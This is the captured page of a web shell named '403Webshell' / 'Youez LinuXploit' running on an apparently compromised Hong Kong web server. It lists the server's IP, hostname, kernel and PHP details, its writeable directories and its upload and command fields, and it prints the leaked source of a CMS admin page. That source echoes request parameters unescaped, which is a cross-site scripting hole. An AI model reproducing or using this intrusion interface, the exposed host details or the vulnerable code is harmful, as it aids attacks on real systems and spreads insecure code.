403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)eizo.hkosl.com/global/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)eizo.hkosl.com/global/webadmin/series_index.php
<?php
	include 'config.php';

	// Check if the user is logged in

	if ((!isSet($_SESSION['loginname'])) || ($loggin <> '1')) {
		header("Location: login.php");
		exit;
	}
	require_once("configure.php");


?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
	<title>Content Management System (CMS) - Powered by One Solution Limited</title>
	<link rel="stylesheet" type="text/css" href="css/style.css"/>
	<!-- Main Menu -->
	<link rel="stylesheet" type="text/css" href="css/menu.css"/>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
	<script type="text/javascript" src="js/ddaccordion.js"></script>
	<script type="text/javascript" src="js/menuddaccordion.js"></script>
	<!-- End Main Menu -->
	<script type="text/javascript">
		function DeleteRow(series_id) {
			if (confirm("Are you sure you want to delete?")) {
				window.location.href = 'series_delete.php?series_id=' + series_id;
			}
		}

	</script>

</head>

<body>
<table width="1000" height="600" border="0" cellpadding="0" cellspacing="0">
	<tr>
		<td width="200" align="left" valign="top">
			<table width="200" border="0" cellpadding="0" cellspacing="0">
				<tr>
					<td height="70" align="left" valign="middle">&nbsp;</td>
				</tr>
				<tr>
					<td width="200" align="left" valign="top"><!-- Main Menu -->
						<?php require("menu.php");?><!-- End Main Menu --></td>
				</tr>
			</table>
		</td>
		<td width="800" align="left" valign="top">
			<table width="800" border="0" cellpadding="0" cellspacing="0">
				<tr>
					<td>
						<table width="800" border="0" cellspacing="0" cellpadding="0">
							<tr>
								<td height="70" class="pagetitletxt">&nbsp;&nbsp;</td>
								<td width="50" align="center" class="icontxt">
									<a href="series_addform.php?region=<?php if(isset($_GET["region"])) echo $_GET["region"]?>"><img src="images/iconNew.png" alt="Add" width="32" height="32" border="0"/><br/>&nbsp;Add&nbsp;&nbsp;
									</a></td>
							</tr>
						</table>
					</td>
				</tr>
				<tr>
					<td class="pagetitletxt">
						&nbsp;&nbsp;<b><img src="images/iconList.jpg" width="48" height="48" align="absmiddle"/> Product Series</b></td>
				</tr>
				<tr>
					<td height="25" align="left" valign="middle" class="msg"><?php if (isset($_GET["msg"])) echo $_GET['msg']; ?></td>
				</tr>

				<tr>
					<td align="left" valign="middle">
						Region: <select onchange="window.location.href='series_index.php?region='+this.value">

							<option value="" <?php if(isset($_GET["region"])) echo "selected";?>>-Please Select-</option>

							<option value="all" <?php if((isset($_GET["region"]) && $_GET["region"] == "all")) echo "selected";?>>Show All</option>
							<option value="CN" <?php if((isset($_GET["region"]) && $_GET["region"] == "CN")) echo "selected";?>>CN</option>
							<option value="HK" <?php if((isset($_GET["region"]) && $_GET["region"] == "HK")) echo "selected";?>>HK</option>
						</select>
					</td>
				</tr>

				<tr>
					<td align="left" valign="middle">
						<table width="800" border="0" cellpadding="0" cellspacing="0">
							<tr>
								<td width="10" class="listtitletxt"></td>
								<!--<td width="40" class="listtitletxt">Sort</td>-->
								<td width="100" class="listtitletxt">Region</td>
								<td width="200" class="listtitletxt">Series Code</td>
								<td width="200" class="listtitletxt">Last Update</td>
								<!--<td width="20" class="listtitletxt"></td>
								<td width="20" class="listtitletxt"></td>-->
								<td width="20" class="listtitletxt"></td>
							</tr>
							<form name="series_sort_update" method="post" action="series_sort_update.php" enctype="multipart/form-data">


								<?php
									if(isset($_GET["region"])){


										if($_GET["region"] == "all") {
											$sql = "SELECT * FROM series where deleted = ? ORDER BY series_code ASC ";
											if (!($sth = $dbh->prepare($sql))) {
												throw new Exception('[' . $sth->errorCode() . ']: ' . print_r($sth->errorInfo()));
											}

											if (!$sth->execute(array("0"))) {
												throw new Exception('[' . $sth->errorCode() . ']: ' . print_r($sth->errorInfo()));
											}
										}else{
											$sql = "SELECT * FROM series where deleted = ? and region = ? ORDER BY series_code ASC ";
											if (!($sth = $dbh->prepare($sql))) {
												throw new Exception('[' . $sth->errorCode() . ']: ' . print_r($sth->errorInfo()));
											}

											if (!$sth->execute(array("0", $_GET["region"]))) {
												throw new Exception('[' . $sth->errorCode() . ']: ' . print_r($sth->errorInfo()));
											}
										}

										while ($row = $sth->fetch(PDO::FETCH_ASSOC)) {
											print "<tr>";
											print "<td class='listtxt' style='padding-left:5'>&nbsp;</td>";

											//print "<td class='listtxt' valign='middle' align='left'><input class='sortinput' type='text' name='idarraynumber[]' value='" . $row{'sort'} . "' size='2' /><input type='hidden' name='idarray[]'  value='" . $row{'series_id'} . "'></td>";

											print "<td class='listtxt' style='padding-left:5'>" . $row{'region'} . "</td>";

											print "<td class='listtxt' style='padding-left:5'>" . $row{'series_code'} . "</td>";

											print "<td class='listtxt' style='padding-left:5'>" . $row{'lastupdate'} . "</td>";

											//Status
										/*	print "<td class='listtxt' align='center'>";
											if ($row{'status'} == '1') // Enable
											{
												print "<a href='series_status.php?series_id=" . $row{'series_id'} . "'>";
												print "<img src='images/tick.png' title='Enable' alt='Enable' border='0' hspace='2'></a>";
											} else // Disable
											{
												print "<a href='series_status.php?series_id=" . $row{'series_id'} . "'>";
												print "<img src='images/cross.png' title='Disable' alt='Disable' border='0' hspace='2'></a>";
											}
											print "</td>";


											print "<td class='listtxt' align='center'><a href='#' onClick=\"window.location='series_modifyform.php?series_id=" . $row{'series_id'} ."'\"><img src='images/btnModify.png' title='Modify' alt='Modify' hspace='2' border='0'></a></td>";*/


											// Delete
											print "<td class='listtxt' align='center'><a href='#' onClick=\"DeleteRow(" . $row{'series_id'} . ")\"><img src='images/btnDelete.png' title='Delete' alt='Delete' hspace='2' border='0'></a></td>";
											print "</tr>";


											print "</tr>";
										}
									}
									$dbh = null;
								?>
						</table>
						<!--<input type="submit" value="Update Sort">--></form></td>
				</tr>
			</table>
		</td>
	</tr>
</table>
</body>
</html>


Youez - 2016 - github.com/yon3zu
LinuXploit